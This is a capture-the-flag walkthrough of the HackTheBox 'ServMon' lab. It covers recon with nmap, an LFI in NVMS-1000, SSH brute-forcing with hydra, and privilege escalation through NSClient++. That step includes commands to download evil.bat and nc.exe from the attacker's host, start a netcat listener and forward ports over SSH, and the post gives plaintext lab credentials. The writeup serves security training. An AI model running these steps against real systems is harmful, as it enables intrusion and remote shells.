Posts HackTheBox - ServMon
Post
Cancel

HackTheBox - ServMon

Posted Jun 24, 2020 2020-06-24T13:06:00+05:30
Updated Jun 26, 2020 2020-06-26T12:33:24+05:30

BoxInfo

Recon

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78

kali@kali:~$ nmap -sC -sV 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:04 EDT
Nmap scan report for 10.10.10.184
Host is up (0.60s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 45s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-11T19:07:54
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.36 seconds

FTP

anonymous ftp login is allowed so we can either use ftp 10.10.10.184 with username anonymous to see the files
or just visit ftp://10.10.10.184 in a browser

from Nadine’s note we know that there is a Passwords.txt file on Nathan’s Desktop i.e. C:\Users\Nathan\Desktop\Passwords.txt exists

Websites

https

the https website has title NSClient++ and it does not look very useful

http

we get a login page with title NVMS-1000

LFI

searchsploit

searching for NVMS on searchsploit gives a LFI exploit

hydra

we can try to ssh using these passwords so i used hydra to bruteforce

User Shell

SSH as Nadine

we can now SSH as nadine using this password –> L1k3B1gBut7s@W0rk

PrivEsc

WinPEAS

i used wget in powershell to download winPEAS.bat file

we can run winPEAS.bat file using the following command in powershell

1

cmd /c winPEAS.bat

the only useful info that winPEAS gave was about the installed softwares
we have NSClient++ installed which is running as the https web service we saw earlier

NSClient++

i used searchsploit for NSClient++ and found a privEsc exploit

the exploit is divided into these 7 steps

step 1

i got the web admin’s password from NSClient.ini file –> ew2x6SsGTxjRwXOT

step 2

this box is very unstable, visiting the https site gave a login prompt for NSClient++ this time

the website loaded properly in Microsoft Edge, so I did some part of the privEsc on my Windows host machine
submitting the password gave a 403 not allowed error

this is probably because only localhost is allowed to login, so we need to access the webpage from ServMon’s localhost
to do this we need to create a tunnel to forward the port 8443 from localhost of ServMon to some port on our machine
to create a tunnel, we can use chisel but in this case as we have SSH creds, so it is easier to use SSH local port forwarding

1

ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

now we can access the website on our machine on https://127.0.0.1:8443/ and we don’t get 403 not allowed error

step 3

put the netcat reverse shell command in evil.bat and wget evil.bat and nc.exe from my machine to ServMon
the nc.exe file is in /usr/share/windows-resources/binaries/ directory

commands to run on kali

1
2

cp /usr/share/windows-resources/binaries/nc.exe .
sudo python3 -m http.server 80

commands to run on ServMon in powershell

1
2

wget -o evil.bat 10.10.14.169/evil.bat
wget -o nc.exe 10.10.14.169/nc.exe

step 4

I setup the netcat listener in my Windows host rather than Kali so I had to user ncat instead of nc

>ncat -lvp 4433

step 5

step 6

rather than setting up a scheduler for the command, I ran it directly from the Queries tab

step 7 (restarting the machine) is not required

HackTheBox, Windows
NVMS LFI hydra winPEAS NSClient++ SSH local port forwarding
This post is licensed under CC BY 4.0

Recent Update

Contents

HackTheBox - Haircut

HackTheBox - Bank

Comments powered by Disqus.